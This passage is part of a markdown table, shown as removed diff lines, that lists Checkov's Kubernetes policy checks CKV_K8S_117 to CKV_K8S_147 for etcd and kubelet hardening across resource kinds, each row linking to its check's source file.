-| 3319 | CKV_K8S_117 | resource | ReplicaSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3320 | CKV_K8S_117 | resource | ReplicationController | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3321 | CKV_K8S_117 | resource | StatefulSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) |
-| 3322 | CKV_K8S_118 | resource | CronJob | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3323 | CKV_K8S_118 | resource | DaemonSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3324 | CKV_K8S_118 | resource | Deployment | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3325 | CKV_K8S_118 | resource | DeploymentConfig | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3326 | CKV_K8S_118 | resource | Job | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3327 | CKV_K8S_118 | resource | Pod | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3328 | CKV_K8S_118 | resource | PodTemplate | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3329 | CKV_K8S_118 | resource | ReplicaSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3330 | CKV_K8S_118 | resource | ReplicationController | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3331 | CKV_K8S_118 | resource | StatefulSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) |
-| 3332 | CKV_K8S_119 | resource | CronJob | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3333 | CKV_K8S_119 | resource | DaemonSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3334 | CKV_K8S_119 | resource | Deployment | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3335 | CKV_K8S_119 | resource | DeploymentConfig | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3336 | CKV_K8S_119 | resource | Job | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3337 | CKV_K8S_119 | resource | Pod | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3338 | CKV_K8S_119 | resource | PodTemplate | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3339 | CKV_K8S_119 | resource | ReplicaSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3340 | CKV_K8S_119 | resource | ReplicationController | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3341 | CKV_K8S_119 | resource | StatefulSet | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) |
-| 3342 | CKV_K8S_121 | resource | Pod | Ensure that the --peer-client-cert-auth argument is set to true | Kubernetes | [PeerClientCertAuthTrue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py) |
-| 3343 | CKV_K8S_138 | resource | CronJob | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3344 | CKV_K8S_138 | resource | DaemonSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3345 | CKV_K8S_138 | resource | Deployment | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3346 | CKV_K8S_138 | resource | DeploymentConfig | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3347 | CKV_K8S_138 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3348 | CKV_K8S_138 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3349 | CKV_K8S_138 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3350 | CKV_K8S_138 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3351 | CKV_K8S_138 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3352 | CKV_K8S_138 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py) |
-| 3353 | CKV_K8S_139 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3354 | CKV_K8S_139 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3355 | CKV_K8S_139 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3356 | CKV_K8S_139 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3357 | CKV_K8S_139 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3358 | CKV_K8S_139 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3359 | CKV_K8S_139 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3360 | CKV_K8S_139 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3361 | CKV_K8S_139 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3362 | CKV_K8S_139 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py) |
-| 3363 | CKV_K8S_140 | resource | CronJob | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3364 | CKV_K8S_140 | resource | DaemonSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3365 | CKV_K8S_140 | resource | Deployment | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3366 | CKV_K8S_140 | resource | DeploymentConfig | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3367 | CKV_K8S_140 | resource | Job | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3368 | CKV_K8S_140 | resource | Pod | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3369 | CKV_K8S_140 | resource | PodTemplate | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3370 | CKV_K8S_140 | resource | ReplicaSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3371 | CKV_K8S_140 | resource | ReplicationController | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3372 | CKV_K8S_140 | resource | StatefulSet | Ensure that the --client-ca-file argument is set as appropriate | Kubernetes | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py) |
-| 3373 | CKV_K8S_141 | resource | CronJob | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3374 | CKV_K8S_141 | resource | DaemonSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3375 | CKV_K8S_141 | resource | Deployment | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3376 | CKV_K8S_141 | resource | DeploymentConfig | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3377 | CKV_K8S_141 | resource | Job | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3378 | CKV_K8S_141 | resource | Pod | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3379 | CKV_K8S_141 | resource | PodTemplate | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3380 | CKV_K8S_141 | resource | ReplicaSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3381 | CKV_K8S_141 | resource | ReplicationController | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3382 | CKV_K8S_141 | resource | StatefulSet | Ensure that the --read-only-port argument is set to 0 | Kubernetes | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py) |
-| 3383 | CKV_K8S_143 | resource | CronJob | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3384 | CKV_K8S_143 | resource | DaemonSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3385 | CKV_K8S_143 | resource | Deployment | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3386 | CKV_K8S_143 | resource | DeploymentConfig | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3387 | CKV_K8S_143 | resource | Job | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3388 | CKV_K8S_143 | resource | Pod | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3389 | CKV_K8S_143 | resource | PodTemplate | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3390 | CKV_K8S_143 | resource | ReplicaSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3391 | CKV_K8S_143 | resource | ReplicationController | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3392 | CKV_K8S_143 | resource | StatefulSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) |
-| 3393 | CKV_K8S_144 | resource | CronJob | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3394 | CKV_K8S_144 | resource | DaemonSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3395 | CKV_K8S_144 | resource | Deployment | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3396 | CKV_K8S_144 | resource | DeploymentConfig | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3397 | CKV_K8S_144 | resource | Job | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3398 | CKV_K8S_144 | resource | Pod | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3399 | CKV_K8S_144 | resource | PodTemplate | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3400 | CKV_K8S_144 | resource | ReplicaSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3401 | CKV_K8S_144 | resource | ReplicationController | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3402 | CKV_K8S_144 | resource | StatefulSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) |
-| 3403 | CKV_K8S_145 | resource | CronJob | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3404 | CKV_K8S_145 | resource | DaemonSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3405 | CKV_K8S_145 | resource | Deployment | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3406 | CKV_K8S_145 | resource | DeploymentConfig | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3407 | CKV_K8S_145 | resource | Job | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3408 | CKV_K8S_145 | resource | Pod | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3409 | CKV_K8S_145 | resource | PodTemplate | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3410 | CKV_K8S_145 | resource | ReplicaSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3411 | CKV_K8S_145 | resource | ReplicationController | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3412 | CKV_K8S_145 | resource | StatefulSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) |
-| 3413 | CKV_K8S_146 | resource | CronJob | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3414 | CKV_K8S_146 | resource | DaemonSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3415 | CKV_K8S_146 | resource | Deployment | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3416 | CKV_K8S_146 | resource | DeploymentConfig | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3417 | CKV_K8S_146 | resource | Job | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3418 | CKV_K8S_146 | resource | Pod | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3419 | CKV_K8S_146 | resource | PodTemplate | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3420 | CKV_K8S_146 | resource | ReplicaSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3421 | CKV_K8S_146 | resource | ReplicationController | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3422 | CKV_K8S_146 | resource | StatefulSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) |
-| 3423 | CKV_K8S_147 | resource | CronJob | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3424 | CKV_K8S_147 | resource | DaemonSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3425 | CKV_K8S_147 | resource | Deployment | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3426 | CKV_K8S_147 | resource | DeploymentConfig | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
-| 3427 | CKV_K8S_147 | resource | Job | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) |
